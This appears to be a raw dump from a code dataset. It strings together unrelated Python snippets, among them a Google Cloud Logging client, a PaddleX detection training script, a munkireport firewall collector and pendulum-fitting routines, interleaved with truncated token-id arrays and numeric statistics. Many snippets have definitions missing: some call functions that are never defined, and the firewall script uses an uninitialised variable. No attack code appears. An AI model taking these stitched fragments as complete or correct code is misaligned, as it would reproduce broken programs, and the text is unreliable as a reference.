'protoPayload' in resource: return ProtobufEntry.from_api_repr(resource, self, loggers) raise ValueError('Cannot parse log entry resource') def list_entries(self, projects=None, filter_=None, order_by=None, page_size=None, page_token=None): """Return a page of log entries. See: https://cloud.google.com/logging/docs/api/ref_v2beta1/rest/v2beta1/entries/list :type projects: list of strings :param projects: project IDs to include. If not passed, defaults to the project bound to the client. :type filter_: str :param filter_: a filter expression. 
See: https://cloud.google.com/logging/docs/view/advanced_filters :type order_by: str :param order_by: One of :data:`~google.cloud.logging.ASCENDING` or :data:`~google.cloud.logging.DESCENDING`. :type page_size: int :param page_size: maximum number of entries to return, If not passed, defaults to a value set by the API. :type page_token: str :param page_token: opaque marker for the next "page" of entries. If not passed, the API will return the first page of entries. :rtype: tuple, (list, str) :returns: list of :class:`google.cloud.logging.entry.TextEntry`, plus a "next page token" string: if not None, indicates that more entries can be retrieved with another call (pass that value as ``page_token``). """ if projects is None: projects = [self.project] resources, token = self.logging_api.list_entries( projects=projects, filter_=filter_, order_by=order_by, page_size=page_size, page_token=page_token) loggers = {} entries = [self._entry_from_resource(resource, loggers) for resource in resources] return entries, token def sink(self, name, filter_=None, destination=None): """Creates a sink bound to the current client. :type name: str :param name: the name of the sink to be constructed. :type filter_: str :param filter_: (optional) the advanced logs filter expression defining the entries exported by the sink. If not passed, the instance should already exist, to be refreshed via :meth:`Sink.reload`. :type destination: str :param destination: destination URI for the entries exported by the sink. If not passed, the instance should already exist, to be refreshed via :meth:`Sink.reload`. :rtype: :class:`google.cloud.logging.sink.Sink` :returns: Sink created with the current client. """ return Sink(name, filter_, destination, client=self) def list_sinks(self, page_size=None, page_token=None): """List sinks for the project associated with this client. See: https://cloud.google.com/logging/docs/api/ref_v2beta1/rest/v2beta1/projects.sinks/list :type page_size: int :param page_size: maximum number of sinks to return, If not passed, defaults to a value set by the API. :type page_token: str :param page_token: opaque marker for the next "page" of sinks. If not passed, the API will return the first page of sinks. :rtype: tuple, (list, str) :returns: list of :class:`google.cloud.logging.sink.Sink`, plus a "next page token" string: if not None, indicates that more sinks can be retrieved with another call (pass that value as ``page_token``). """ resources, token = self.sinks_api.list_sinks( self.project, page_size, page_token) sinks = [Sink.from_api_repr(resource, self) for resource in resources] return sinks, token def metric(self, name, filter_=None, description=''): """Creates a metric bound to the current client. :type name: str :param name: the name of the metric to be constructed. :type filter_: str :param filter_: the advanced logs filter expression defining the entries tracked by the metric. If not passed, the instance should already exist, to be refreshed via :meth:`Metric.reload`. :type description: str :param description: the description of the metric to be constructed. If not passed, the instance should already exist, to be refreshed via :meth:`Metric.reload`. :rtype: :class:`google.cloud.logging.metric.Metric` :returns: Metric created with the current client. """ return Metric(name, filter_, client=self, description=description) def list_metrics(self, page_size=None, page_token=None): """List metrics for the project associated with this client. 
See: https://cloud.google.com/logging/docs/api/ref_v2beta1/rest/v2beta1/projects.metrics/list :type page_size: int :param page_size: maximum number of metrics to return, If not passed, defaults to a value set by the API. :type page_token: str :param page_token: opaque marker for the next "page" of metrics. If not passed, the API will return the first page of metrics. :rtype: tuple, (list, str) :returns: list of :class:`google.cloud.logging.metric.Metric`, plus a "next page token" string: if not None, indicates that more metrics can be retrieved with another call (pass that value as ``page_token``). """ resources, token = self.metrics_api.list_metrics( self.project, page_size, page_token) metrics = [Metric.from_api_repr(resource, self) for resource in resources] return metrics, token
[ 2, 15069, 1584, 3012, 3457, 13, 198, 2, 198, 2, 49962, 739, 262, 24843, 13789, 11, 10628, 362, 13, 15, 357, 1169, 366, 34156, 15341, 198, 2, 345, 743, 407, 779, 428, 2393, 2845, 287, 11846, 351, 262, 13789, 13, 198, 2, 921, 743, ...
2.394016
3,977
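The Stackdriver Logging client above exposes list_entries, sink, metric and their list_* counterparts. A hypothetical sketch of how they fit together, with an invented project id, filter and sink destination, and following the (results, token) return shape shown in list_entries:

from google.cloud import logging

client = logging.Client(project="my-project")

# page through recent entries matching an advanced filter
entries, token = client.list_entries(filter_="severity>=ERROR", page_size=10)
for entry in entries:
    print(entry.payload)

# metric and sink objects bound to this client
metric = client.metric("error-count", filter_="severity>=ERROR",
                       description="Count of error entries")
sink = client.sink("error-sink", filter_="severity>=ERROR",
                   destination="storage.googleapis.com/my-bucket")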
from __future__ import absolute_import
from unittest import TestCase
import os
import importlib
import inspect

from plotly.basedatatypes import BasePlotlyType, BaseFigure

datatypes_root = "new_plotly/graph_objs"
datatype_modules = [
    dirpath.replace("/", ".")
    for dirpath, _, _ in os.walk(datatypes_root)
    if not dirpath.endswith("__pycache__")
]
[ 6738, 11593, 37443, 834, 1330, 4112, 62, 11748, 198, 6738, 555, 715, 395, 1330, 6208, 20448, 198, 11748, 28686, 198, 11748, 1330, 8019, 198, 11748, 10104, 198, 198, 6738, 7110, 306, 13, 3106, 265, 265, 9497, 1330, 7308, 43328, 306, 6030...
2.834646
127
import logging
from collections import namedtuple

from . import export

log = logging.getLogger(__name__)

NO_QUERY = 0
PARSED_QUERY = 1
RAW_QUERY = 2

SpecialCommand = namedtuple('SpecialCommand', ['handler', 'command', 'shortcut',
                            'description', 'arg_type', 'hidden', 'case_sensitive'])

COMMANDS = {}


def show_keyword_help(cur, arg):
    """
    Call the built-in "show <command>", to display help for an SQL keyword.
    :param cur: cursor
    :param arg: string
    :return: list
    """
    keyword = arg.strip('"').strip("'")
    query = "help '{0}'".format(keyword)
    log.debug(query)
    cur.execute(query)
    if cur.description and cur.rowcount > 0:
        headers = [x[0] for x in cur.description]
        return [(None, cur, headers, '')]
    else:
        return [(None, None, None, 'No help found for {0}.'.format(keyword))]
[ 11748, 18931, 198, 6738, 17268, 1330, 3706, 83, 29291, 198, 198, 6738, 764, 1330, 10784, 198, 198, 6404, 796, 18931, 13, 1136, 11187, 1362, 7, 834, 3672, 834, 8, 198, 198, 15285, 62, 10917, 19664, 796, 657, 198, 27082, 50, 1961, 62, ...
2.527697
343
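The SpecialCommand namedtuple and COMMANDS dict above form a small command registry, and show_keyword_help is a typical handler. Purely as an illustration (the real package presumably registers commands through a decorator that is not shown here), an entry could be added like this:

COMMANDS['help'] = SpecialCommand(
    handler=show_keyword_help,
    command='help',
    shortcut='\\?',
    description='Show help for an SQL keyword.',
    arg_type=PARSED_QUERY,
    hidden=False,
    case_sensitive=False,
)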
from abc import ABC, abstractmethod
[ 6738, 450, 66, 1330, 9738, 11, 12531, 24396, 628 ]
4.111111
9
# convert2.py
#      A program to convert Celsius temps to Fahrenheit.
#      This version issues heat and cold warnings.

main()
[ 2, 10385, 17, 13, 9078, 198, 2, 220, 220, 220, 220, 220, 317, 1430, 284, 10385, 34186, 2169, 862, 284, 35935, 13, 198, 2, 220, 220, 220, 220, 220, 770, 2196, 2428, 4894, 290, 4692, 14601, 13, 198, 198, 12417, 3419 ]
3.146341
41
"""The Wolf SmartSet Service integration.""" from datetime import timedelta import logging from httpx import ConnectError, ConnectTimeout from wolf_smartset.token_auth import InvalidAuth from wolf_smartset.wolf_client import FetchFailed, ParameterReadError, WolfClient from homeassistant.config_entries import ConfigEntry from homeassistant.const import CONF_PASSWORD, CONF_USERNAME from homeassistant.core import HomeAssistant from homeassistant.exceptions import ConfigEntryNotReady from homeassistant.helpers.update_coordinator import DataUpdateCoordinator, UpdateFailed from .const import ( COORDINATOR, DEVICE_GATEWAY, DEVICE_ID, DEVICE_NAME, DOMAIN, PARAMETERS, ) _LOGGER = logging.getLogger(__name__) PLATFORMS = ["sensor"]
[ 37811, 464, 8662, 10880, 7248, 4809, 11812, 526, 15931, 198, 6738, 4818, 8079, 1330, 28805, 12514, 198, 11748, 18931, 198, 198, 6738, 2638, 87, 1330, 8113, 12331, 11, 8113, 48031, 198, 6738, 17481, 62, 27004, 2617, 13, 30001, 62, 18439, ...
3.196653
239
# test
ld = LevenshteinDistance()
ld.solve('kitten', 'sitting')
ld.show()
[ 2, 1332, 198, 335, 796, 1004, 574, 1477, 22006, 45767, 3419, 198, 335, 13, 82, 6442, 10786, 74, 2621, 41707, 82, 2535, 11537, 198, 335, 13, 12860, 3419 ]
2.571429
28
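The test above relies on a LevenshteinDistance class that is not part of the snippet. A minimal dynamic-programming sketch with the same solve()/show() interface (assumed, not the original implementation):

class LevenshteinDistance:
    def solve(self, a, b):
        # classic edit-distance table: d[i][j] is the distance
        # between the first i chars of a and the first j chars of b
        rows, cols = len(a) + 1, len(b) + 1
        d = [[0] * cols for _ in range(rows)]
        for i in range(rows):
            d[i][0] = i
        for j in range(cols):
            d[0][j] = j
        for i in range(1, rows):
            for j in range(1, cols):
                cost = 0 if a[i - 1] == b[j - 1] else 1
                d[i][j] = min(d[i - 1][j] + 1,        # deletion
                              d[i][j - 1] + 1,        # insertion
                              d[i - 1][j - 1] + cost) # substitution
        self.distance = d[-1][-1]

    def show(self):
        print(self.distance)  # 'kitten' -> 'sitting' gives 3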
import numpy as np
import unittest

from pyapprox.benchmarks.spectral_diffusion import (
    kronecker_product_2d, chebyshev_derivative_matrix,
    SteadyStateDiffusionEquation2D, SteadyStateDiffusionEquation1D
)
from pyapprox.univariate_polynomials.quadrature import gauss_jacobi_pts_wts_1D
import pyapprox as pya


if __name__ == "__main__":
    spectral_diffusion_test_suite = \
        unittest.TestLoader().loadTestsFromTestCase(TestSpectralDiffusion2D)
    unittest.TextTestRunner(verbosity=2).run(spectral_diffusion_test_suite)
[ 11748, 299, 32152, 355, 45941, 198, 11748, 555, 715, 395, 198, 198, 6738, 12972, 1324, 13907, 13, 26968, 14306, 13, 4443, 1373, 62, 26069, 4241, 1330, 357, 198, 220, 220, 220, 479, 33171, 15280, 62, 11167, 62, 17, 67, 11, 1125, 48209,...
2.614634
205
import torch
from torch import nn
from torch.nn import functional as F

from torchdrug import layers
[ 11748, 28034, 198, 6738, 28034, 1330, 299, 77, 198, 6738, 28034, 13, 20471, 1330, 10345, 355, 376, 198, 198, 6738, 28034, 30349, 1330, 11685, 198 ]
4.04
25
#!/usr/bin/env python3
import logging
import json
import os

__author__ = 'adamkoziol'
[ 2, 48443, 14629, 14, 8800, 14, 24330, 21015, 18, 198, 11748, 18931, 198, 11748, 33918, 198, 11748, 28686, 198, 834, 9800, 834, 796, 705, 324, 321, 7204, 89, 1669, 6, 628 ]
2.806452
31
import numpy as np
from sklearn.utils.multiclass import type_of_target

from mindware.base_estimator import BaseEstimator
from mindware.components.utils.constants import type_dict, MULTILABEL_CLS, IMG_CLS, TEXT_CLS, OBJECT_DET
from mindware.components.feature_engineering.transformation_graph import DataNode
[ 11748, 299, 32152, 355, 45941, 198, 6738, 1341, 35720, 13, 26791, 13, 16680, 291, 31172, 1330, 2099, 62, 1659, 62, 16793, 198, 6738, 2000, 1574, 13, 8692, 62, 395, 320, 1352, 1330, 7308, 22362, 320, 1352, 198, 6738, 2000, 1574, 13, 55...
3.131313
99
# -*- coding: utf-8 -*-
import scrapy
import json
import os
import codecs

from AnimeSpider.items import AnimespiderItem
[ 2, 532, 9, 12, 19617, 25, 3384, 69, 12, 23, 532, 9, 12, 198, 11748, 15881, 88, 198, 11748, 33918, 198, 11748, 28686, 198, 11748, 40481, 82, 198, 6738, 27812, 41294, 13, 23814, 1330, 1052, 999, 79, 1304, 7449, 628 ]
3.025
40
import cv2

print(cv2.__version__)
[ 11748, 269, 85, 17, 198, 4798, 269, 85, 17, 13, 834, 9641, 834, 220, 198 ]
2.266667
15
"""Setup for pytest-testplan plugin.""" from setuptools import setup setup( name='pytest-testplan', version='0.1.0', description='A pytest plugin to generate a CSV test report.', author='Darlene Wong', author_email='darlene.py@gmail.com', license='MIT', py_modules=['pytest_testplan'], install_requires=['pytest'], entry_points={'pytest11': ['testplan = pytest_testplan', ]}, )
[ 37811, 40786, 329, 12972, 9288, 12, 9288, 11578, 13877, 526, 15931, 198, 6738, 900, 37623, 10141, 1330, 9058, 628, 198, 40406, 7, 198, 220, 220, 220, 1438, 11639, 9078, 9288, 12, 9288, 11578, 3256, 198, 220, 220, 220, 2196, 11639, 15, ...
2.632911
158
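The setup.py above only registers a pytest11 entry point named testplan; the plugin module itself is not shown. A hypothetical sketch of what a CSV-report plugin module could contain, using standard pytest hooks (the real pytest_testplan module may well differ):

import csv

_results = []

def pytest_runtest_logreport(report):
    # record the outcome of the "call" phase of each test
    if report.when == "call":
        _results.append((report.nodeid, report.outcome, report.duration))

def pytest_sessionfinish(session):
    # dump the collected outcomes to a CSV file at the end of the run
    with open("testplan_report.csv", "w", newline="") as fh:
        writer = csv.writer(fh)
        writer.writerow(["test", "outcome", "duration"])
        writer.writerows(_results)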
# GPU # https://paddlex.readthedocs.io/zh_CN/develop/appendix/parameters.html#gpu import os os.environ['CUDA_VISIBLE_DEVICES'] = '0' from paddlex.det import transforms import paddlex as pdx # aluminum_dataset = 'https://bj.bcebos.com/paddlex/examples/industrial_quality_inspection/datasets/aluminum_inspection.tar.gz' pdx.utils.download_and_decompress(aluminum_dataset, path='./') # transforms # API https://paddlex.readthedocs.io/zh_CN/develop/apis/transforms/det_transforms.html train_transforms = transforms.Compose([ transforms.MixupImage(mixup_epoch=250), transforms.RandomDistort(), transforms.RandomExpand(), transforms.RandomCrop(), transforms.Resize( target_size=608, interp='RANDOM'), transforms.RandomHorizontalFlip(), transforms.Normalize() ]) eval_transforms = transforms.Compose([ transforms.Resize( target_size=608, interp='CUBIC'), transforms.Normalize() ]) # # APIhttps://paddlex.readthedocs.io/zh_CN/develop/apis/datasets.html#paddlex-datasets-vocdetection train_dataset = pdx.datasets.VOCDetection( data_dir='aluminum_inspection', file_list='aluminum_inspection/train_list.txt', label_list='aluminum_inspection/labels.txt', transforms=train_transforms, shuffle=True) eval_dataset = pdx.datasets.VOCDetection( data_dir='aluminum_inspection', file_list='aluminum_inspection/val_list.txt', label_list='aluminum_inspection/labels.txt', transforms=eval_transforms) # # VisualDLhttps://paddlex.readthedocs.io/zh_CN/develop/train/visualdl.html num_classes = len(train_dataset.labels) # API: https://paddlex.readthedocs.io/zh_CN/develop/apis/models/detection.html#paddlex-det-yolov3 model = pdx.det.YOLOv3(num_classes=num_classes, backbone='MobileNetV3_large') # API: https://paddlex.readthedocs.io/zh_CN/develop/apis/models/detection.html#train # https://paddlex.readthedocs.io/zh_CN/develop/appendix/parameters.html model.train( num_epochs=400, train_dataset=train_dataset, train_batch_size=8, eval_dataset=eval_dataset, warmup_steps=4000, learning_rate=0.000125, lr_decay_epochs=[240, 320], save_dir='output/yolov3_mobilenetv3', use_vdl=True)
[ 2, 11362, 198, 2, 3740, 1378, 79, 2860, 2588, 13, 961, 83, 704, 420, 82, 13, 952, 14, 23548, 62, 44175, 14, 16244, 14, 1324, 19573, 14, 17143, 7307, 13, 6494, 2, 46999, 198, 11748, 28686, 198, 418, 13, 268, 2268, 17816, 43633, 563...
2.46538
881
# Generated by Django 3.1.4 on 2021-01-07 19:32

from django.db import migrations, models
import django.db.models.deletion
[ 2, 2980, 515, 416, 37770, 513, 13, 16, 13, 19, 319, 33448, 12, 486, 12, 2998, 678, 25, 2624, 198, 198, 6738, 42625, 14208, 13, 9945, 1330, 15720, 602, 11, 4981, 198, 11748, 42625, 14208, 13, 9945, 13, 27530, 13, 2934, 1616, 295, 6...
2.818182
44
# -*- coding: utf-8 -*- from __future__ import unicode_literals from django.db import models, migrations import wooey.models.mixins
[ 2, 532, 9, 12, 19617, 25, 3384, 69, 12, 23, 532, 9, 12, 198, 6738, 11593, 37443, 834, 1330, 28000, 1098, 62, 17201, 874, 198, 198, 6738, 42625, 14208, 13, 9945, 1330, 4981, 11, 15720, 602, 198, 11748, 36440, 2959, 13, 27530, 13, 1...
2.913043
46
#!/usr/bin/python """ Firewall for munkireport. By Tuxudo Will return all details about how the firewall is configured """ import subprocess import os import sys import platform import re import plistlib import json sys.path.insert(0,'/usr/local/munki') sys.path.insert(0, '/usr/local/munkireport') from munkilib import FoundationPlist def get_firewall_info(): '''Uses system profiler to get firewall info for the machine.''' cmd = ['/usr/sbin/system_profiler', 'SPFirewallDataType', '-xml'] proc = subprocess.Popen(cmd, shell=False, bufsize=-1, stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE) (output, unused_error) = proc.communicate() try: plist = plistlib.readPlistFromString(output) # system_profiler xml is an array firewall_dict = plist[0] items = firewall_dict['_items'] return items except Exception: return {} def flatten_firewall_info(array): '''Un-nest firewall info, return array with objects with relevant keys''' firewall = {} for obj in array: for item in obj: if item == '_items': out = out + flatten_firewall_info(obj['_items']) elif item == 'spfirewall_services': for service in obj[item]: if obj[item][service] == "spfirewall_allow_all": obj[item][service] = 1 else: obj[item][service] = 0 firewall['services'] = json.dumps(obj[item]) elif item == 'spfirewall_applications': for application in obj[item]: if obj[item][application] == "spfirewall_allow_all": obj[item][application] = 1 else: obj[item][application] = 0 firewall['applications'] = json.dumps(obj[item]) return firewall def main(): """Main""" # Skip manual check if len(sys.argv) > 1: if sys.argv[1] == 'manualcheck': print 'Manual check: skipping' exit(0) # Create cache dir if it does not exist cachedir = '%s/cache' % os.path.dirname(os.path.realpath(__file__)) if not os.path.exists(cachedir): os.makedirs(cachedir) # Set the encoding # The "ugly hack" :P reload(sys) sys.setdefaultencoding('utf8') # Get results result = dict() info = get_firewall_info() result = merge_two_dicts(flatten_firewall_info(info), get_alf_preferences()) # Write firewall results to cache output_plist = os.path.join(cachedir, 'firewall.plist') FoundationPlist.writePlist(result, output_plist) #print FoundationPlist.writePlistToString(result) if __name__ == "__main__": main()
[ 2, 48443, 14629, 14, 8800, 14, 29412, 198, 198, 37811, 198, 13543, 11930, 329, 285, 2954, 557, 634, 13, 198, 3886, 309, 2821, 12003, 198, 8743, 1441, 477, 3307, 546, 703, 262, 32928, 318, 17839, 198, 37811, 198, 198, 11748, 850, 14681...
2.15258
1,337
# AUTOGENERATED! DO NOT EDIT! File to edit: nbs/metrics.ipynb (unless otherwise specified). __all__ = ['recall_at_k', 'precision_at_k'] # Cell from typing import List # Cell def recall_at_k(predictions: List[int], targets: List[int], k: int = 10) -> float: """Computes `Recall@k` from the given predictions and targets sets.""" predictions_set = set(predictions[:k]) targets_set = set(targets) result = len(targets_set & predictions_set) / float(len(targets_set)) return result # Cell def precision_at_k(predictions: List[int], targets: List[int], k: int = 10) -> float: """Computes `Precision@k` from the given predictions and targets sets.""" predictions_set = set(predictions[:k]) targets_set = set(targets) result = len(targets_set & predictions_set) / float(len(predictions_set)) return result
[ 2, 47044, 7730, 1677, 1137, 11617, 0, 8410, 5626, 48483, 0, 9220, 284, 4370, 25, 299, 1443, 14, 4164, 10466, 13, 541, 2047, 65, 357, 25252, 4306, 7368, 737, 198, 198, 834, 439, 834, 796, 37250, 8344, 439, 62, 265, 62, 74, 3256, 70...
2.797342
301
#!/usr/bin/env/ python import os from math import pi import numpy as np from numpy import ma from scipy.optimize import leastsq import matplotlib.pyplot as plt from uncertainties import ufloat # local modules from .io import load_pendulum_mat_file def average_rectified_sections(data): '''Returns a slice of an oscillating data vector based on the max and min of the mean of the sections created by retifiying the data. Parameters ---------- data : ndarray, shape(n,) Returns ------- data : ndarray, shape(m,) A slice where m is typically less than n. Notes ----- This is a function to try to handle the fact that some of the data from the torsional pendulum had a beating like phenomena and we only want to select a section of the data that doesn't seem to exhibit the phenomena. ''' # subtract the mean so that there are zero crossings meanSubData = data - np.mean(data) # find the zero crossings zeroCrossings = np.where(np.diff(np.sign(meanSubData)))[0] # add a zero to the beginning crossings = np.concatenate((np.array([0]), zeroCrossings)) # find the mean value of the rectified sections and the local indice secMean = [] localMeanInd = [] for sec in np.split(np.abs(meanSubData), zeroCrossings): localMeanInd.append(np.argmax(sec)) secMean.append(np.mean(sec)) meanInd = [] # make the global indices for i, val in enumerate(crossings): meanInd.append(val + localMeanInd[i]) # only take the top part of the data because some the zero crossings can be # a lot at one point mainly due to the resolution of the daq box threshold = np.mean(secMean) secMeanOverThresh = [] indice = [] for i, val in enumerate(secMean): if val > threshold: secMeanOverThresh.append(val) indice.append(meanInd[i]) # now return the data based on the max value and the min value maxInd = indice[np.argmax(secMeanOverThresh)] minInd = indice[np.argmin(secMeanOverThresh)] return data[maxInd:minInd] def calc_periods_for_files(directory, filenames, forkIsSplit): '''Calculates the period for all filenames in directory. Parameters ---------- directory : string This is the path to the RawData directory. filenames : list List of all the mat file names in the RawData directory. forkIsSplit : boolean True if the fork is broken into a handlebar and fork and false if the fork and handlebar was measured together. Returns ------- periods : dictionary Contains all the periods for the mat files in the RawData directory. 
''' periods = {} def pathParts(path): '''Splits a path into a list of its parts.''' components = [] while True: (path,tail) = os.path.split(path) if tail == "": components.reverse() return components components.append(tail) pathToRawDataParts = pathParts(directory) pathToRawDataParts.pop() pathToBicycleDir = os.path.join(pathToRawDataParts[0], pathToRawDataParts[1], pathToRawDataParts[2]) pathToPlotDir = os.path.join(pathToBicycleDir, 'Plots', 'PendulumFit') # make sure there is a place to save the plots if not os.path.exists(pathToPlotDir): os.makedirs(pathToPlotDir) for f in filenames: print("Calculating the period for:", f) # load the pendulum data pathToMatFile = os.path.join(directory, f) matData = load_pendulum_mat_file(pathToMatFile) # generate a variable name for this period periodKey = get_period_key(matData, forkIsSplit) # calculate the period sampleRate = get_sample_rate(matData) pathToPlotFile = os.path.join(pathToPlotDir, os.path.splitext(f)[0] + '.png') period = get_period_from_truncated(matData['data'], sampleRate, pathToPlotFile) print("The period is:", period, "\n") # either append the the period or if it isn't there yet, then # make a new list try: periods[periodKey].append(period) except KeyError: periods[periodKey] = [period] # now average all the periods for k, v in periods.items(): if k.startswith('T'): periods[k] = np.mean(v) return periods def check_for_period(mp, forkIsSplit): '''Returns whether the fork is split into two pieces and whether the period calculations need to happen again. Parameters ---------- mp : dictionary Dictionary the measured parameters. forkIsSplit : boolean True if the fork is broken into a handlebar and fork and false if the fork and handlebar was measured together. Returns ------- forcePeriodCalc : boolean True if there wasn't enough period data in mp, false if there was. forkIsSplit : boolean True if the fork is broken into a handlebar and fork and false if the fork and handlebar was measured together. ''' forcePeriodCalc = False #Check to see if mp contains at enough periods to not need # recalculation ncTSum = 0 ntTSum = 0 for key in mp.keys(): # check for any periods in the keys if key[:2] == 'Tc': ncTSum += 1 elif key[:2] == 'Tt': ntTSum += 1 # if there isn't enough data then force the period cals again if forkIsSplit: if ncTSum < 5 or ntTSum < 11: forcePeriodCalc = True else: if ncTSum < 4 or ntTSum < 8: forcePeriodCalc = True return forcePeriodCalc def fit_goodness(ym, yp): ''' Calculate the goodness of fit. Parameters ---------- ym : ndarray, shape(n,) The vector of measured values. yp : ndarry, shape(n,) The vector of predicted values. Returns ------- rsq : float The r squared value of the fit. SSE : float The error sum of squares. SST : float The total sum of squares. SSR : float The regression sum of squares. ''' SSR = np.sum((yp - np.mean(ym))**2) SST = np.sum((ym - np.mean(ym))**2) SSE = SST - SSR rsq = SSR / SST return rsq, SSE, SST, SSR def get_period(data, sampleRate, pathToPlotFile): '''Returns the period and uncertainty for data resembling a decaying oscillation. Parameters ---------- data : ndarray, shape(n,) A time series that resembles a decaying oscillation. sampleRate : int The frequency that data was sampled at. pathToPlotFile : string A path to the file to print the plots. Returns ------- T : ufloat The period of oscillation and its uncertainty. 
''' y = data x = np.linspace(0., (len(y) - 1) / float(sampleRate), num=len(y)) def fitfunc(p, t): '''Decaying oscillation function.''' a = p[0] b = np.exp(-p[3] * p[4] * t) c = p[1] * np.sin(p[4] * np.sqrt(1 - p[3]**2) * t) d = p[2] * np.cos(p[4] * np.sqrt(1 - p[3]**2) * t) return a + b * (c + d) # initial guesses #p0 = np.array([1.35, -.5, -.75, 0.01, 3.93]) # guess from delft #p0 = np.array([2.5, -.75, -.75, 0.001, 4.3]) # guess from ucd p0 = make_guess(data, sampleRate) # tries to make a good guess # create the error function errfunc = lambda p, t, y: fitfunc(p, t) - y # minimize the error function p1, success = leastsq(errfunc, p0[:], args=(x, y)) lscurve = fitfunc(p1, x) # find the uncertainty in the fit parameters rsq, SSE, SST, SSR = fit_goodness(y, lscurve) sigma = np.sqrt(SSE / (len(y) - len(p0))) # calculate the jacobian L = jac_fitfunc(p1, x) # the Hessian H = np.dot(L.T, L) # the covariance matrix U = sigma**2. * np.linalg.inv(H) # the standard deviations sigp = np.sqrt(U.diagonal()) # natural frequency wo = ufloat(p1[4], sigp[4]) # damping ratio zeta = ufloat(p1[3], sigp[3]) # damped natural frequency wd = (1. - zeta**2.)**(1. / 2.) * wo # damped natural frequency (hz) fd = wd / 2. / pi # period T = 1. / fd # plot the data and save it to file fig = plt.figure() plot_osfit(x, y, lscurve, p1, rsq, T, m=np.max(x), fig=fig) plt.savefig(pathToPlotFile) plt.close() # return the period return T def get_period_key(matData, forkIsSplit): '''Returns a dictionary key for the period entries. Parameters ---------- matData : dictionary The data imported from a pendulum mat file. forkIsSplit : boolean True if the fork is broken into a handlebar and fork and false if the fork and handlebar was measured together. Returns ------- key : string A key of the form 'T[pendulum][part][orientation]'. For example, if it is the frame that was hung as a torsional pendulum at the second orientation angle then the key would be 'TtB2'. ''' # set up the subscripting for the period key subscripts = {'Fwheel': 'F', 'Rwheel': 'R', 'Frame': 'B', 'Flywheel': 'D'} # the Flywheel is for the gyro bike and it actually represents the front # wheel and the flywheel as one rigid body. It was easier to measure the # the inertia this way. So...the to get the actual flywheel inertia, one # must subtract the inertia of the Fwheel, F, from the Flywheel, D. if forkIsSplit: subscripts['Fork'] = 'S' subscripts['Handlebar'] = 'G' else: subscripts['Fork'] = 'H' try: subscripts[matData['rod']] = 'P' except KeyError: subscripts['Rod'] = 'P' # used to convert word ordinals to numbers ordinal = {'First' : '1', 'Second' : '2', 'Third' : '3', 'Fourth' : '4', 'Fifth' : '5', 'Sixth' : '6'} try: orienWord = matData['angleOrder'] except: orienWord = matData['angle'] pend = matData['pendulum'][0].lower() part = subscripts[matData['part']] orienNum = ordinal[orienWord] return 'T' + pend + part + orienNum def get_sample_rate(matData): '''Returns the sample rate for the data.''' if 'ActualRate' in matData.keys(): sampleRate = matData['ActualRate'] else: sampleRate = matData['sampleRate'] return sampleRate def jac_fitfunc(p, t): ''' Calculate the Jacobian of a decaying oscillation function. Uses the analytical formulations of the partial derivatives. Parameters ---------- p : the five parameters of the equation t : time vector Returns ------- jac : The jacobian, the partial of the vector function with respect to the parameters vector. A 5 x N matrix where N is the number of time steps. 
''' jac = np.zeros((len(p), len(t))) e = np.exp(-p[3] * p[4] * t) dampsq = np.sqrt(1 - p[3]**2) s = np.sin(dampsq * p[4] * t) c = np.cos(dampsq * p[4] * t) jac[0] = np.ones_like(t) jac[1] = e * s jac[2] = e * c jac[3] = (-p[4] * t * e * (p[1] * s + p[2] * c) + e * (-p[1] * p[3] * p[4] * t / dampsq * c + p[2] * p[3] * p[4] * t / dampsq * s)) jac[4] = (-p[3] * t * e * (p[1] * s + p[2] * c) + e * dampsq * t * (p[1] * c - p[2] * s)) return jac.T def make_guess(data, sampleRate): '''Returns a decent starting point for fitting the decaying oscillation function. ''' p = np.zeros(5) # the first unknown is the shift along the y axis p[0] = np.mean(data) # work with the mean subtracted data from now on data = data - p[0] # what is the initial slope of the curve if data[10] > data[0]: slope = 1 else: slope = -1 # the second is the amplitude for the sin function p[1] = slope * np.max(data) / 2 # the third is the amplitude for the cos function p[2] = slope * np.max(data) # the fourth is the damping ratio and is typically small, 0.001 < zeta < 0.02 p[3] = 0.001 # the fifth is the undamped natural frequency # first remove the data around zero dataMasked = ma.masked_inside(data, -0.1, 0.1) # find the zero crossings zeroCrossings = np.where(np.diff(np.sign(dataMasked)))[0] # remove redundant crossings zero = [] for i, v in enumerate(zeroCrossings): if abs(v - zeroCrossings[i - 1]) > 20: zero.append(v) # get the samples per period samplesPerPeriod = 2*np.mean(np.diff(zero)) # now the frequency p[4] = (samplesPerPeriod / float(sampleRate) /2. / pi)**-1 if np.isnan(p[4]): p[4] = 4. return p def plot_osfit(t, ym, yf, p, rsq, T, m=None, fig=None): '''Plot fitted data over the measured Parameters ---------- t : ndarray (n,) Measurement time in seconds ym : ndarray (n,) The measured voltage yf : ndarray (n,) p : ndarray (5,) The fit parameters for the decaying osicallation fucntion rsq : float The r squared value of y (the fit) T : float The period m : float The maximum value to plot Returns ------- fig : the figure ''' # figure properties figwidth = 4. # in inches goldenMean = (np.sqrt(5) - 1.0) / 2.0 figsize = [figwidth, figwidth * goldenMean] params = {#'backend': 'ps', 'axes.labelsize': 8, 'axes.titlesize': 8, 'text.fontsize': 8, 'legend.fontsize': 8, 'xtick.labelsize': 6, 'ytick.labelsize': 6, 'text.usetex': True, #'figure.figsize': figsize } if fig: fig = fig else: fig = plt.figure(2) fig.set_size_inches(figsize) plt.rcParams.update(params) ax1 = plt.axes([0.125, 0.125, 0.9-0.125, 0.65]) #if m == None: #end = len(t) #else: #end = t[round(m/t[-1]*len(t))] ax1.plot(t, ym, '.', markersize=2) plt.plot(t, yf, 'k-') plt.xlabel('Time [s]') plt.ylabel('Amplitude [V]') equation = r'$f(t)={0:1.2f}+e^{{-({3:1.3f})({4:1.1f})t}}\left[{1:1.2f}\sin{{\sqrt{{1-{3:1.3f}^2}}{4:1.1f}t}}+{2:1.2f}\cos{{\sqrt{{1-{3:1.3f}^2}}{4:1.1f}t}}\right]$'.format(p[0], p[1], p[2], p[3], p[4]) rsquare = '$r^2={0:1.3f}$'.format(rsq) period = '$T={0} s$'.format(T) plt.title(equation + '\n' + rsquare + ', ' + period) plt.legend(['Measured', 'Fit']) if m is not None: plt.xlim((0, m)) else: pass return fig def select_good_data(data, percent): '''Returns a slice of the data from the index at maximum value to the index at a percent of the maximum value. Parameters ---------- data : ndarray, shape(1,) This should be a decaying function. percent : float The percent of the maximum to clip. This basically snips of the beginning and end of the data so that the super damped tails are gone and also any weirdness at the beginning. 
